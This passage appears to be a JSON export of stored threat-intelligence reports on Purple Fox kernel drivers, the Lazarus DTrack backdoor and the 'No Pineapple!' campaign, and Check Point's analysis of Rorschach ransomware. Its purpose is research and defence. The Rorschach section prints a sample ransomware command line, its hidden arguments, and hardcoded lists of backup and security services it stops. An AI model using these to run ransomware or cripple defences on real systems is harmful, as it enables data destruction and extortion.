enumerates all the registered\nmini filter drivers on the system using the system API FltEnumerateFilters,\nthen it gets the targeted mini-filter object information it is searching for by\ncalling FltGetFilterInformation. Lastly, it creates a new system thread to\nunregister the mini-filter driver and terminate the created system thread\n(PsCreateSystemThread, FltUnregisterFilter).\n\n\fFigure 7 shows the specific call graph for the system APIs used for this\nfunctionality.\n\nThe uses of revoked code signing certificates\n\nTo control the quality of the code that runs in the address space of the\nkernel-land, Microsoft only allows signed drivers to run in kernel mode. They\ndo this by enforcing kernel-mode code signing (KMCS) mechanisms.\n\nDue to performance issues and backward compatibility, Windows actually\nallows the loading of a kernel driver signed by a revoked code signing\ncertificate. So, by testing a previous kernel driver and allowing it to be\nrevoked, it can be loaded successfully. This design choice allows mature\nthreat actors to chase and pursue any stolen code signing certificate and add\nit to their malware arsenal. If the malware authors acquire any certificate that\nhas been verified by a trusted certificate authority and by Microsoft, even if it\nwas revoked, attackers can use it for malicious purposes.\n\nLinks to previous Purple Fox activities and artifacts\n\nAnalyzing the artifacts dropped by this new infection chain, we first looked at\nthe stolen code signing certificates used to sign the kernel drivers modules.\nThis led us to analyze other signed malicious samples in our malware\nrepository, which revealed links to previously known intrusion sets.\n\nThere were three different stolen code signing certificates confirmed to be\nrelated to this campaign with links to Purple Fox:\n\n\f  Hangzhou Hootian Network Technology Co., Ltd. - We found a strong\n\nconnection to early activity of the Purple Fox botnet that started in 2019.\n\n  Shanghai Oceanlink Software Technology Co. Ltd. - Analysis revealed\nseveral clusters of malicious kernel modules previously used in Purple\nFox activities.\n\n  Shanghai easy kradar Information Consulting Co. Ltd.  This certificate\noverlaps with Hangzhou Hootian Network in signing a common cluster\nof kernel drivers that was also previously seen in Purple Fox activities.\n\nThis campaign is similar with earlier Purple Fox activities in other ways as\nwell, namely, how the attack infrastructure is run and the malware hosted on\ntheir servers:\n\n  The first stage C&C server 202[.]8.123[.]98 links FatalRAT operators\n\nwith the Purple Fox. The server was hosting the malicious compressed\narchives in this campaign and was used before by FatalRAT as their\nmain C&C server.\n\n  One of the first stage servers (194.146.84.245) hosted an old module\nfor the MSI installer for Purple Fox (e1f3ac7f.moe) that will eventually\nload the crypto miner discussed in the previous blogs.\n\n  The dropped FatalRAT from the malicious archive found on the first\nstage C&C server revealed many code similarities with a previously\ndocumented info stealer known as Zegost. We go into commonalities\nfound between these Purple Fox campaign modules and the old Zegost\nsamples in our technical brief.\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-21T16:09:56.725Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "650c9410ab1fab17048d3e49"
  },
  "name": "DTrack",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "DTrack.pdf",
  "file_size": "110 KB",
  "content": "DTrack is a backdoor used by the Lazarus group. Initially discovered in 2019, the\nbackdoor remains in use three years later. It is used by the Lazarus group against a wide\nvariety of targets. For example, weve seen it being used in nancial environments where\nATMs were breached, in attacks on a nuclear power plant and also in targeted\nransomware attacks. Essentially, anywhere the Lazarus group believes they can achieve\nsome nancial gain.\n\nDTrack allows criminals to upload, download, start or delete les on the victim host.\nAmong those downloaded and executed les already spotted in the standard DTrack\ntoolset there is a keylogger, a screenshot maker and a module for gathering victim\nsystem information. With a toolset like this, criminals can implement lateral movement\ninto the victims infrastructure in order to, for example, retrieve compromising\ninformation.\n\nAs part of our crimeware reporting service, we published a new private report about\nrecent Dtrack activity. In this public article we highlight some of the main ndings\nshared in that report. For more information about our crimeware reporting service,\nplease contact crimewareintel@kaspersky.com.\n\nSo, whats new?\n\nDTrack itself hasnt changed much over the course of time. Nevertheless, there are\nsome interesting modications that we want to highlight in this blogpost. Dtrack hides\nitself inside an executable that looks like a legitimate program, and there are several\nstages of decryption before the malware payload starts.\n\nFirst stage  implanted code\n\nDTrack unpacks the malware in several stages. The second stage is stored inside the\nmalware PE le. To get it, there are two approaches:\n\noffset based;\nresource based.\n\nThe idea is that DTrack retrieves the payload by reading it from an offset within the le\nor by reading it from a resource within the PE binary. An example of a decompiled\npseudo function that retrieves the data using the offset-based approach can be found\nbelow.\n\n \n \n\fAfter retrieving the location of the next stage and its key, the malware then decrypts the\nbuffer (with a modied RC4 algorithm) and passes control to it. To gure out the offset\nof the payload, its size and decryption keys, DTrack has a special binary (we have\ndubbed it Decrypt cong) structure hidden in an inconspicuous part of the PE le.\n\nSecond stage  shellcode\n\nThe second stage payload consists of heavily obfuscated shellcode as can be seen\nbelow.\n\nThe encryption method used by the second layer differs for each sample. So far, we\nhave spotted modied versions of RC4, RC5 and RC6 algorithms. The values of the third\nstage payload and its decryption key are obtained by reading Decrypt cong again.\n\nOne new aspect of the recent DTrack variants is that the third stage payload is not\nnecessarily the nal payload; there may be another piece of binary data consisting of a\nbinary conguration and at least one shellcode, which in turn decrypts and executes the\nnal payload.\n\nThird stage  shellcode and nal binary\n\nThe shellcode has some quite interesting obfuscation tricks to make analysis more\ndicult. When started, the beginning of the key (used to decrypt the nal payload) is\nsearched for. For example, when the beginning of the key is 0xDEADBEEF, the shellcode\nsearches for the rst occurrence of 0xDEADBEEF.\n\nOnce the key is found, the shellcode uses it to decrypt the next eight bytes after the key,\nwhich form yet another conguration block with nal payload size and its entry point\noffset. The conguration block is followed by an encrypted PE payload that starts at the\nentry point offset after decryption with the custom algorithm.\n\nFinal payload\n\nOnce the nal payload (a DLL) is decrypted, it is loaded using process hollowing into\nexplorer.exe. In previous DTrack samples the libraries to be loaded were obfuscated\nstrings. In more recent versions they use API hashing to load the proper libraries and\nfunctions. Another small change is that three C2 servers are used instead of six. The\nrest of the payloads functionality remains the same.\n\nInfrastructure\n\n\fWhen we look at the domain names used for C2 servers, a pattern can be seen in some\ncases. For example, the actors combine a color with the name of an animal (e.g.,\npinkgoat, purplebear, salmonrabbit). Some of the peculiar names used in the DTrack\ninfrastructure can be found below:\n\nVictims\n\nAccording to KSN telemetry, we have detected DTrack activity in Germany, Brazil, India,\nItaly, Mexico, Switzerland, Saudi Arabia, Turkey and the United States, indicating that\nDTrack is spreading into more parts of the world. The targeted sectors are education,\nchemical manufacturing, governmental research centers and policy institutes, IT service\nproviders, utility providers and telecommunications.\n\nConclusions\n\nThe DTrack backdoor continues to be used actively by the Lazarus group. Modications\nin the way the malware is packed show that Lazarus still sees DTrack as an important\nasset. Despite this, Lazarus has not changed the backdoor much since 2019, when it\nwas initially discovered. When the victimology is analyzed, it becomes clear that\noperations have expanded to Europe and Latin America, a trend were seeing more and\nmore often.\n\nNorth Korean hackers are using a new version of the DTrack backdoor to\n\nattack organizations in Europe and Latin America.\n\nDTrack is a modular backdoor featuring a keylogger, a screenshot snapper, a\n\nbrowser history retriever, a running processes snooper, an IP address and\n\nnetwork connection information snatcher, and more.\n\nApart from spying, it can also run commands to perform file operations, fetch\n\nadditional payloads, steal files and data, and execute processes on the\n\ncompromised device.\n\nThe new malware version doesn't feature many functional or code changes\n\ncompared to samples analyzed in the past, but it is now deployed far more\n\nwidely.\n\n\fA wider distribution\n\nAs Kaspersky explains in a report published today, their telemetry shows\n\nDTrack activity in Germany, Brazil, India, Italy, Mexico, Switzerland, Saudi\n\nArabia, Turkey, and the United States.\n\nThe targeted sectors include government research centers, policy institutes,\n\nchemical manufacturers, IT service providers, telecommunication providers,\n\nutility service providers, and education.\n\nIn the new campaign, Kaspersky has seen DTrack distributed using filenames\n\ncommonly associated with legitimate executables.\n\nFor example, one sample they shared is distributed under the\n\n'NvContainer.exe' file name, which is the same name as a legitimate NVIDIA\n\nfile.\n\nKaspersky told BleepingComputer that DTrack continues to be installed by\n\nbreaching networks using stolen credentials or exploiting Internet-exposed\n\nservers, as seen in previous campaigns.\n\nWhen launched, the malware goes through multiple decryption steps before\n\nits final payload is loaded via process hollowing into an \"explorer.exe\" process,\n\nrunning directly from memory.\n\nThe only differences to past DTrack variants are it now uses API hashing to\n\nload libraries and functions instead of obfuscated strings, and that the number\n\nof C2 servers has been cut by half to just three.\n\nSome of the C2 servers uncovered by Kaspersky are pinkgoat[.]com,\n\npurewatertokyo[.]com, purplebear[.]com, and salmonrabbit[.]com.\n\nDTrack attribution\n\n\fKaspersky attributes this activity to the North Korean Lazarus hacking group\n\nand claims the threat actors use DTrack whenever they see the potential for\n\nfinancial gains.\n\nIn August 2022, the same researchers linked the backdoor to the North\n\nKorean hacking group tracked as 'Andariel,' which deployed Maui ransomware\n\nin corporate networks in the U.S. and South Korea.\n\nIn February 2020, Dragos linked DTrack to a North Korean threat group,\n\n'Wassonite,' which attacked nuclear energy and oil and gas facilities.\n\nA new cyber espionage campaign dubbed 'No Pineapple!' has been attributed\n\nto the North Korean Lazarus hacking group, allowing the threat actors to\n\nstealthily steal 100GB of data from the victim without causing any destruction.\n\nThe campaign lasted between August and November 2022, targeting\n\norganizations in medical research, healthcare, chemical engineering, energy,\n\ndefense, and a leading research university.\n\nThe operation was discovered by Finnish cybersecurity firm WithSecure,\n\nwhose analysts were called to investigate a potential ransomware incident on\n\none of its customers. However, thanks to an operational mistake by Lazarus,\n\nthey were able to link the campaign to the North Korean APT.\n\nWithSecure was able to attribute the activity based on multiple pieces of\n\nevidence but also noticed some new developments for Lazarus, like:\n\n the use of new infrastructure using IP addresses without domain\n\nnames,\n\n a new version of the Dtrack info-stealer malware,\n\n a new version of the GREASE malware used in admin account creation\n\nand protection bypass.\n\n\fThe campaign is named after the '< No Pineapple! >' error seen transmitted by\n\na remote access malware when uploading stolen data to the threat actor's\n\nservers.\n\nQuietly stealing data\n\nThe Lazarus hackers compromised the victim's network on August 22nd,\n\n2022, by leveraging the CVE-2022-27925 (remote code execution) and\n\nCVE-2022-37042 (authentication bypass) Zimbra vulnerabilities to drop a\n\nwebshell on the target's mail server.\n\nThis RCE flaw was patched in May 2022, but the authentication bypass took\n\nZimbra until August 12th to release a security update. By that time, it was\n\nalready under active exploitation by threat actors.\n\nAfter successfully breaching the network, the hackers deployed the tunneling\n\ntools 'Plink and '3Proxy' to create reverse tunnels back to the threat actors'\n\ninfrastructure, allowing the threat actors to bypass the firewall.\n\nLess than a week after, WithSecure says the intruders began utilizing modified\n\nscripts to extract approximately 5GB of email messages from the server and\n\nsave them to a locally stored CSV file, which was later uploaded to the\n\nattacker's server.\n\nOver the next two months, the threat actors spread laterally through the\n\nnetwork, acquiring administrator credentials and stealing data from devices.\n\nWhile spreading through the network, Lazarus deployed multiple custom\n\ntools, such as Dtrack and what is believed to be a new version of the GREASE\n\nmalware, used to locate Windows administrator accounts.\n\n\fDtrack is an information-stealing backdoor known to be used by Lazarus,\n\nwhile the GREASE malware is associated with Kimusky, another North\n\nKorean state-sponsored hacking group.\n\nThe attack culminated on November 5th, 2022, with the actors lurking in the\n\nnetwork for over two months and ultimately stealing 100GB of data from the\n\ncompromised organization.\n\nWithSecure was able to analyze the work patterns of the threat actors, stating\n\nthat they worked Monday through Saturday from 9 AM to 10 PM.\n\n\"Time zone attribution analysis concluded that the time zone aligns with UTC\n\n+9. Reviewing activity by time of day finds that most threat actor activity\n\noccurred between 00:00 to 15:00 UTC (09:00 and 21:00 UTC +9),\" shared\n\nWithSecure.\n\n\"Analysing activity by day of the week suggests that the threat actor was active\n\nMonday to Saturday, a common work pattern for DPRK.\"\n\nNew malware and tactics\n\nThe first notable change found in this Lazarus campaign is that they now rely\n\nsolely on IP addresses without domain names for their infrastructure.\n\nThis change has advantages for the threat actors, including reduced need for\n\nrenewal maintenance and greater IP flexibility.\n\nThe new Dtrack variant spotted in the recent Lazarus attacks is dropped by an\n\nexecutable named 'onedriver.exe,' and it no longer uses its own C2 server for\n\ndata exfiltration.\n\n\fInstead, it relies on a separate backdoor to transfer the data it has gathered\n\nlocally on the compromised machine, storing them in a password-protected\n\narchive.\n\n\"The staging and exfiltration host was likely carefully chosen by the threat\n\nactor to be a host where endpoint security monitoring tools were not\n\ndeployed,\" explains WithSecure in the report.\n\nThe new GREASE malware used by Lazarus is executed on the host as a DLL\n\n(\"Ord.dll\") with higher privileges achieved by exploiting the 'PrintNightmare'\n\nflaw.\n\nIts main difference compared to previous versions is that it now uses\n\nRDPWrap to install an RDP service onto the host to create a privileged user\n\naccount with the help of net user commands.\n\nExposed by errors\n\nEven for highly sophisticated threat actors like Lazarus, making mistakes isn't\n\nunheard of, and in this case, allowed the campaigns to be attributed to the\n\nhacking group.\n\nWithSecure's investigation of retrieved network logs from the victim revealed\n\nthat one of the web shells planted by the intruders was communicating with a\n\nNorth Korean IP address (\"175.45.176[.]27\").\n\nThis isolated incident occurred at the beginning of that day, preceded by\n\nconnections from a proxy address, indicating that the threat actor likely\n\nexposed themselves by an error at the start of their workday.\n\nAdditionally, WithSecure observed that various commands executed on the\n\nbreached network devices were very similar to those hardcoded inside Lazarus\n\n\fmalware but often contained mistakes and didn't execute, indicating that the\n\nthreat actors were typing them manually using the Impacket 'atexec' module.\n\nApart from the mistakes, WithSecure was able to link these operations to\n\nLazarus based on TTP overlaps detailed in previous reports by Symantec and\n\nCisco Talos, the employed malware strains, the profiles of the targets,\n\ninfrastructure overlaps, and time-zone analysis.\n\nWithSecure's report is another indication of Lazarus' activity, with the threat\n\ngroup continuing its efforts to gather intelligence and exfiltrate large amounts\n\nof data from high-profile victims.\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-21T19:05:52.587Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "650df4d16521ab30af1e7393"
  },
  "name": "Rorschach (Failed)",
  "file_type": null,
  "website_url": "https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/",
  "website_title": "Rorschach – A New Sophisticated and Fast Ransomware - Check Point Research",
  "file_name": null,
  "file_size": null,
  "content": "RORSCHACH – A NEW SOPHISTICATED AND FAST RANSOMWARE\nApril 4, 2023\nResearch by: Jiri  Vinopal, Dennis Yarizadeh and Gil Gekker\nKey Findings:\nCheck Point Research (CPR) and Check Point Incident Response Team (CPIRT) encountered a previously unnamed ransomware strain, we dubbed Rorschach, deployed against a US-based company.\nRorschach ransomware appears to be unique, sharing no overlaps that could easily attribute it to any known ransomware strain. In addition, it does not bear any kind of branding which is a common practice among ransomware groups.\nThe ransomware is partly autonomous, carrying out tasks that are usually manually performed during enterprise-wide ransomware deployment, such as creating a domain group policy (GPO). In the past, similar functionality was linked to LockBit 2.0.\nThe ransomware is highly customizable and contains technically unique features, such as the use of direct syscalls, rarely observed in ransomware. Moreover, due to different implementation methods, Rorschach is one of the fastest ransomware observed, by the speed of encryption.\nThe ransomware was deployed using DLL side-loading of a Cortex XDR Dump Service Tool, a signed commercial security product, a loading method which is not commonly used to load ransomware. The vulnerability was properly reported to Palo Alto Networks.\nIntroduction\nWhile responding to a ransomware case against a US-based company, the CPIRT recently came across a unique ransomware strain deployed using a signed component of a commercial security product. Unlike other ransomware cases, the threat actor did not hide behind any alias and appears to have no affiliation to any of the known ransomware groups. Those two facts, rarities in the ransomware ecosystem, piqued CPR interest and prompted us to thoroughly analyze the newly discovered malware.\nThroughout its analysis, the new ransomware exhibited unique features. A behavioral analysis of the new ransomware suggests it is partly autonomous, spreading itself automatically when executed on a Domain Controller (DC), while it clears the event logs of the affected machines. In addition, it’s extremely flexible, operating not only based on a built-in configuration but also on numerous optional arguments which allow it to change its behavior according to the operator’s needs. While it seems to have taken inspiration from some of the most infamous ransomware families, it also contains unique functionalities, rarely seen among ransomware, such as the use of direct syscalls.\nThe ransomware note sent out to the victim was formatted similarly to Yanluowang ransomware notes, although other variants dropped a note that more closely resembled DarkSide ransomware notes (causing some to mistakenly refer to it as DarkSide). Each person who examined the ransomware saw something a little bit different, prompting us to name it after the famous psychological test – Rorschach Ransomware.\nExecution Flow\nAs observed in the wild, Rorschach execution uses these three files:\ncy.exe – Cortex XDR Dump Service Tool version 7.3.0.16740, abused to side-load winutils.dll\nwinutils.dll – Packed Rorschach loader and injector, used to decrypt and inject the ransomware.\nconfig.ini – Encrypted Rorschach ransomware which contains all the logic and configuration.\nUpon execution of cy.exe, due to DLL side-loading, the loader/injector winutils.dll is loaded into memory and runs in the context of cy.exe. The main Rorschach payload config.ini is subsequently loaded into memory as well, decrypted and injected into notepad.exe, where the ransomware logic begins.\nFigure 1 – Rorschach’s High Level Execution Flow on both endpoints and on Domain Controllers.\nSecurity Solution Evasion\nRorschach spawns processes in an uncommon way, running them in SUSPEND mode and giving out falsified arguments to harden analysis and remediation efforts. The falsified argument, which consists of a repeating string of the digit 1 based on the length of the real argument, rewritten in memory and replaced with the real argument, resulting in a unique execution:\nFigure 2 – Rorschach’s process tree spawns processes with falsified arguments.\nThe ransomware uses this technique to run the following operations:\nAttempt to stop a predefined list of services, using net.exe stop.\nDelete shadow volumes and backups to harden recovery, using legitimate Windows tools such as vssadmin.exe, bcdedit.exe, wmic.exe, and wbadmin.exe\nRun wevutil.exe to clear the following Windows event logs: Application, Security, System and Windows Powershell.\nDisable the Windows firewall, using netsh.exe\nSelf-propagation\nWhen executed on a Windows Domain Controller (DC), the ransomware automatically creates a Group Policy, spreading itself to other machines within the domain. Similar functionality was linked in the past to LockBit 2.0, although the Rorschach Ransomware GPO deployment is carried out differently, as described below:\nRorschach copies its files into the scripts folder of the DC, and deletes them from the original location.\nRorschach then creates a group policy (see Appendix C) that copies itself into the %Public% folder of all workstations in the domain.\nThe ransomware creates another group policy in an attempt to kill a list of predefined list of processes. This is done by creating a schedule task invoking taskkill.exe.\nFinally, Rorschach creates another group policy that registers a scheduled task which runs immediately and upon user logon, to run Rorschach’s main executable with the relevant arguments.\nOur colleagues in AhnLab published a more thorough behavioral analysis of another Rorschach variant which provides further details into the operations.\nRansomware Analysis\nIn addition to the ransomware’s uncommon behavior described above, the Rorschach binary itself contains additional interesting features, differentiating it further from other ransomware.\nBinary and Anti-Analysis Protection\nThe actual sample is protected carefully, and requires quite a lot of work to access. First, the initial loader/injector winutils.dll is protected with UPX-style packing. However, this is changed in such a way that it isn’t readily unpacked using standard solutions and requires manual unpacking. After unpacking, the sample loads and decrypts config.ini, which contains the ransomware logic.\nAfter Rorschach is injected into notepad.exe, it’s still protected by VMProtect. This results in a crucial portion of the code being virtualized in addition to lacking an IAT table. Only after defeating both of these safeguards is it possible to properly analyze the ransomware logic.\nSecurity Solution Evasion\nAlthough Rorschach is used solely for encrypting an environment, it incorporates an unusual technique to evade defense mechanisms. It makes direct system calls using the “syscall” instruction. While previously observed in other strains of malware, it’s quite startling to see this in ransomware.\nThe procedure involves utilizing the instruction itself, and it goes as follows:\nThe ransomware finds the relevant syscall numbers for NT APIs, mainly related to file manipulation.\nRorschach then stores the numbers in a table for future use.\nWhen needed, it calls a stub routine that uses the number directly with the syscall instruction instead of using the NT API.\nIn other words, the malware first creates a syscall table for NT APIs used for file encryption:\nFigure 3 – Creation of syscall table for certain NT APIs.\nThe end of the table is a section with the relevant syscall numbers:\nFigure 4 – Section containing the syscall table.\nThe example below shows how the syscall numbers are used:\nFigure 5 – Example use of direct syscall.\nThis obfuscated process is not required for the ransomware encryption logic, which suggests it was developed to bypass security solutions monitoring direct API calls.\nCommand Line Arguments\nIn addition to the hardcoded configuration, the ransomware comes with multiple built-in options, probably for the operators comfort. All of them are hidden, obfuscated, and not accessible without reverse-engineering the ransomware. This table contains some of the arguments that we discovered:\nArgument Example Parameter Description\n–run =1234 Password needed to run the sample, possibly built on demand.\n–nomutex =1 Do not create a mutex, therefore do not insure that only a single instance is running.\n–log =1 Create log files.\n–nodel =0 Do not self-delete on execution.\n–path =“C:” Encrypt only the following path.\n–noshare =1 Do not encrypt shares.\n–pt =”C:.dll” Explicitly state the loader DLL.\n–cg =”C:.ini” Explicitly state the configuration file that stores the malware.\n–we =”C:.exe” Explicitly state the main executable.\n–diskpart =1 Run diskpart.exe /s AppData_x.txt that removes read- only volume attributes.\n–nobk =1 Do not change the wallpaper of the infected machine.\n–thread =4 Number of threads per CPU.\n–at =2023/03/24 05:04:20 Activation time (trigger time).\n–nomail =1 Do not create a ransom note.\nThis is only a partial list, with additional arguments suggesting networking capabilities, such as listen, srv and hostfile.\nExample of how some of these arguments are used:\ncy.exe --run=1234 --nomutex=0 --log=1 --nodel=1 --path=\"C:\\Myfolder\" --full=1 --diskpart=1 --nobk=0\nLanguage Based Protection\nBefore encrypting the target system, the sample runs two system checks that can halt its execution:\nIt uses GetSystemDefaultUILanguage and GetUserDefaultUILanguage to determine what language the user is using.\nIt exits if the return value is commonly used in CIS countries:\n{\n    0x042b: \"Armenian_Armenia\",\n    0x042c: \"Azeri_Latin\",\n    0x043f: \"Kazakh\",\n    0x082c: \"Azeri_Cyrillic\",\n    0x419: \"Russian\",\n    0x422: \"Ukrainian\",\n    0x423: \"Belarusian\",\n    0x428: \"Tajik\",\n    0x437: \"Georgian\",\n    0x440: \"Kyrgyz_Cyrillic\",\n    0x442: \"Turkmen\",\n    0x443: \"Uzbek_Latin\",\n    0x819: \"Russian_Moldava\",\n    0x843: \"Uzbek_Cyrillic\"\n}\nEncryption Process\nThe Rorschach ransomware employs a highly effective and fast hybrid-cryptography scheme, which blends the curve25519 and eSTREAM cipher hc-128 algorithms for encryption purposes. This process only encrypts a specific portion of the original file content instead of the entire file. The WinAPI CryptGenRandom is utilized to generate cryptographically random bytes used as a per-victim private key. The shared secret is calculated through curve25519, using both the generated private key and a hardcoded public key. Finally, the computed SHA512 hash of the shared secret is used to construct the KEY and IV for the eSTREAM cipher hc-128.\nFigure 6 – The Rorschach hybrid-cryptography scheme.\nAnalysis of Rorschach’s encryption routine suggests not only the fast encryption scheme mentioned previously but also a highly effective implementation of thread scheduling via I/O completion ports. In addition, it appears that compiler optimization is prioritized for speed, with much of the code being inlined. All of these factors make us believe that we may be dealing with one of the fastest ransomware out there.\nTo verify our hypothesis, we conducted five separate encryption speed tests in a controlled environment (with 6 CPUs, 8192MB RAM, SSD, and 220000 files to be encrypted), limited to local drive encryption only. To provide a meaningful comparison with other known fast ransomware, we compared Rorschach with the notorious LockBit v.3.\nThe result of the speed tests:\nRansomware Average approximate time of encryption\nLockBit v.3 7 minutes\nRorschach 4 minutes, 30 seconds\nIt turned out that we have a new speed demon in town. What’s even more noteworthy is that the Rorschach ransomware is highly customizable. By adjusting the number of encryption threads via the command line argument --thread, it can achieve even faster times.\nTechnical Similarity to Other Ransomware\nWhen we compared Rorschach to other well-known ransomware families, we noticed that Rorschach uses a variety of time-honored methods together with some novel ideas in the ransomware industry. The name itself, “Rorschach”, is quite self-explanatory; with deep reverse engineering of the code and its logic, we found certain similarities with some of the more technically advanced and established ransomware groups.\nWe discussed Rorschach’s hybrid-cryptography scheme in detail above, but we suspect that this routine was borrowed from the leaked source code of Babuk ransomware. See the following code snippets as examples:\nFigure 7 – Hybrid-cryptography scheme of Rorschach vs. Babuk.\nRorschach’s inspiration from Babuk is evident in various routines, including those responsible for stopping processes and services. In fact, the code used to stop services through the service control manager appears to have been directly copied from Babuk’s source code:\nFigure 8 – Stopping predefined list of services – Rorschach vs. Babuk.\nIt is also worth noting that the list of services to be stopped in Rorschach’s configuration is identical to that in the leaked Babuk source code. However, the list of processes to be stopped differs slightly, as Rorschach omits notepad.exe, which is used as a target for code injection.\nRorahsach takes inspiration from another ransomware strain: LockBit. First, the list of languages used to halt the malware is exactly the same list that was used in LockBit v2.0  (although the list is commonly used by many Russian speaking groups, and not just LockBit). However, the I/O Completion Ports method of thread scheduling is another component where Rorschach took some inspiration from LockBit. The final renaming of the encrypted machine files in Rorschach is implemented via NtSetInformationFile using FileInformationClass FileRenameInformation, just like in LockBit v2.0.\nFigure 9 – Renaming of encrypted file using NtSetInformationFile.\nAs noted before, Rorschach’s code is protected and obfuscated in a way that is unusual for ransomware, and is compiled with compiler optimization to favor speed and code inlining as much as possible. This makes finding similarities with other well-known ransomware families a real brain-buster. But we can still say that Rorschach took the best from the ransomware families with the highest reputation, and then added some unique features of its own.\nRansom Notes\nAs we noted, Rorschach does not exhibit any clear-cut overlaps with any of the known ransomware groups but does appear to draw inspiration from some of them.\nWe mentioned previously that Ahnlab reported a similar attack earlier this year. While it was carried out through different means, the ransomware described in the report triggers an almost identical execution flow. However, the resulting ransom note was completely different. The note was actually very similar to those issued by DarkSide, which probably led to this new ransomware being named “DarkSide,” despite the group being inactive since May 2021.\nThe Rorschach variant we analyzed leaves a different ransom note based on the structure used by Yanlowang, another ransomware group:\nFigure 10 – Ransom note from Rorschach.\nConclusion\nOur analysis of Rorschach reveals the emergence of a new ransomware strain in the crimeware landscape. Its developers implemented new anti-analysis and defense evasion techniques to avoid detection and make it more difficult for security software and researchers to analyze and mitigate its effects. Additionally, Rorschach appears to have taken some of the ‘best’ features from some of the leading ransomwares leaked online, and integrated them all together. In addition to Rorschach’s self-propagating capabilities, this raises the bar for ransom attacks. The operators and developers of the Rorschach ransomware remain unknown. They do not use branding, which is relatively rare in ransomware operations.\nOur findings underscore the importance of maintaining strong cybersecurity measures to prevent ransomware attacks, as well as the need for continuous monitoring and analysis of new ransomware samples to stay ahead of evolving threats. As these attacks continue to grow in frequency and sophistication, it is essential for organizations to remain vigilant and proactive in their efforts to safeguard against these threats.\nHarmony Endpoint provides runtime protection against ransomware with instant automated remediation, even in offline mode.\nWhen running on a machine infected with the Rorschach ransomware, Harmony Endpoint Anti-ransomware detected the encryption process in different folders, including modifications made to Harmony Endpoint ‘honeypot’ files. It ran a ranking algorithm that provided a verdict identifying the process as a ransomware.  \nSamples/IOCs\nFiles\nName Hash Comments\ncy.exe 2237ec542cdcd3eb656e86e43b461cd1 PA Cortex Dump Service Tool (benign file)\nwinutils.dll 4a03423c77fe2c8d979caca58a64ad6c Loader and injector into notepad.exe\nconfig.ini 6bd96d06cd7c4b084fe9346e55a81cf9 Encrypted ransomware payload\nAppendix A – Services and processes terminated through GPO by Rorschach\nThe following services are stopped through a GPO issued by Rorschach, probably to prevent conflicting write orders to Database files (and thus preventing encryption):\nSQLPBDMS\nSQLPBENGINE\nMSSQLFDLauncher\nSQLSERVERAGENT\nMSSQLServerOLAPService\nSSASTELEMETRY\nSQLBrowser\nSQL Server Distributed Replay Client\nSQL Server Distributed Replay Controller\nMsDtsServer150\nSSISTELEMETRY150\nSSISScaleOutMaster150\nSSISScaleOutWorker150\nMSSQLLaunchpad\nSQLWriter\nSQLTELEMETRY\nMSSQLSERVER\nThe following processes are killed using a group policy (scheduled task) issued by Rorschach executing C:\\windows\\system32\\taskkill.exe. Some are likely terminated to prevent write conflicts, and some are security solutions:\nwxServer.exe\nwxServerView.exe\nsqlmangr.exe\nRAgui.exe\nsupervise.exe\nCulture.exe\nDefwatch.exe\nhttpd.exe\nsync-taskbar\nsync-worker\nwsa_service.exe\nsynctime.exe\nvxmon.exe\nsqlbrowser.exe\ntomcat6.exe\nSqlservr.exe\nAppendix B – Hardcoded Rorschach configuration\nThe following is a list of services, hardcoded in its configuration, to be stopped via the service control manager:\nAcronisAgent\nAcrSch2Svc\nbackup\nBackupExecAgentAccelerator\nBackupExecAgentBrowser\nBackupExecDiveciMediaService\nBackupExecJobEngine\nBackupExecManagementService\nBackupExecRPCService\nBackupExecVSSProvider\nCAARCUpdateSvc\nCASAD2DWebSvc\nccEvtMgr\nccSetMgr\nDefWatch\nGxBlr\nGxCIMgr\nGxCVD\nGxFWD\nGxVss\nIntuit.QuickBooks.FCS\nmemtas\nmepocs\nPDVFSService\nQBCFMonitorService\nQBFCService\nQBIDPService\nRTVscan\nSavRoam\nsophos\nsql\nstc_raw_agent\nsvc$\nveeam\nVeeamDeploymentService\nVeeamNFSSvc\nVeeamTransportSvc\nVSNAPVSS\nvss\nYooBackup\nYooIT\nzhudongfangyu\nThe following is a hardcoded list of directories and files to be omitted from encryption:\n.\n..\n#recycle\n$Recycle.Bin\n1_config.ini\nAhnlab\nAll Users\nAppData\nAUTOEXEC.BAT\nautoexec.bat\nautorun.inf\nbegin.txt\nBoot\nboot.ini\nbootfont.bin\nbootmgfw.efi\nbootmgr\nbootmgr.efi\nbootsect.bak\nconfig.ini\ndesktop.ini\nfinish.txt\nGoogle\niconcache.db\nInternet Explorer\nMozilla\nMozilla Firefox\nNETLOGON\nntldr\nntuser.dat\nNTUSER.DAT\nntuser.dat.log\nntuser.dat.LOG1\nntuser.dat.LOG2\nntuser.ini\nOpera\nOpera Software\nPolicies\nProgram Files\nProgram Files (x86)\nProgramData\nscripts\nSYSVOL\nthumbs.db\nTor Browser\nWindows\nWINDOWS\nWindows.old\nThe following is a list of process names that during Rorschach’s execution these names are compared to those running on the machine and killed if matched. This is done through a combination of CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, OpenProcess, and TerminateProcess. There is some overlap and redundancy to the list of services killed via the service control 